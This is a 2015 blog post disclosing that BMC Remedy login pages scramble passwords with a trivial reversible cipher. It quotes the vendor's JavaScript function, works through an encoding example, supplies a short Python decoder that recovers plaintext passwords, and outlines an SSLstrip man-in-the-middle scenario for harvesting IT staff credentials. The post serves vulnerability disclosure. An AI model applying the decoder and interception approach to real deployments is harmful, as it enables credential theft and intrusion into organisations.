Local Tech Repair: Remedy 7.x, 8.x and possibly 9.x login password decoder

Friday, September 11, 2015

Remedy 7.x, 8.x and possibly 9.x login password decoder

So recently I have been doing some QA for a BMC Remedy product that my work is starting to work with. One thing i noticed right away is that the cipher that they use is extremely bad and basically plain text.


So here is how it works. when you go to the login page for a remedy product when you sign in there is a javascript that encodes the password field to a ciphered text. BMC suggests always using HTTPS with their products to make sure its secure though it is disabled by default. You can find more on their Best Practice Security guidelines here. https://docs.bmc.com/docs/display/public/ars81/General+security+guidelines

Here is the javascript cipher that is used in their products. 



function getScrambledPassword(pwd) {
    var cipher = ['k', 's', 'z', 'h', 'x', 'b', 'p', 'j', 'v', 'c', 'g', 'f', 'q', 'n', 't', 'm'];
    var result="";
    if (pwd == null)
        pwd = "";
    pwd = encodeURIComponent(pwd);
    //alert("encoded password: " + pwd);
    for(var i=0;i<pwd.length;i++) {
            var cc = pwd.charCodeAt(i);
        result += cipher[Math.floor(cc/16)] + cipher[cc%16];
    }
    //alert("scrambled password: " + result);
    return result;
}



what this code does it takes the inputed password then does a urlencode and brakes it down into char codes and then passes that on to some math.  so for instance
input @
encodeuricomponent = %40
for each charactor in the encoded uri charactor we get 37 52 48
so for each the cipher is calculated and picked
for instance the first time it goes through it uses 37
so math.floor of 37/16 = 2
the 2nd item in the cipher is z
then it adds cipher 37 mod 16 = 5
cipher 5 = b
so from the first encoded uri charactor we get zb
and then it repeats for the next encoded uri charactor
this gives us the encoding
zbhxhk



so what this means for decoding is 2 things because the math rounds down we can't really get the key code that way but because they were doing a mod on this it gives us the remainder anyways. 


so here is an PoC python decoder for the Remedy cipher.
import os
import urllib
print "Welcome to the BMC Remedy password decoder"
password = raw_input('Enter Password hash: ')
cipher = ['k', 's', 'z', 'h', 'x', 'b', 'p', 'j', 'v', 'c', 'g', 'f', 'q', 'n', 't', 'm']
decryptedpass = ""
num = 0
while num < len(password):
    ciphernum = cipher.index(password[num])
    encodednum = ciphernum * 16
    num = num+1
    ciphernum = cipher.index(password[num])
    encodednum += ciphernum
    decryptedpass += chr(encodednum)
    num = num +1
print urllib.unquote(decryptedpass)


What this means as an attack vector:

With in many organizations their users are very used to continuing even if they get a https warning about certificate because people generally think the company is keeping them safe. 


If an attacker gets into a organization and then does a MiTM attack using a SSLstrip the attacker could in turn gather all of IT users credentials or even some. This would greatly increase the attackers speed of penetrating the organization. 

If you use remedy please request that the vendor fix this issue. This has been around for some time and has been posted in other going back years and still have not been fixed.  
for example
http://rewtdance.blogspot.com/2012/05/bmc-remedy-password-descrambling.html
http://myitpath.blogspot.com/2010/09/reversing-remedy-passwords.html

are 2 that popup on the first page


- Local Tech Repair Admin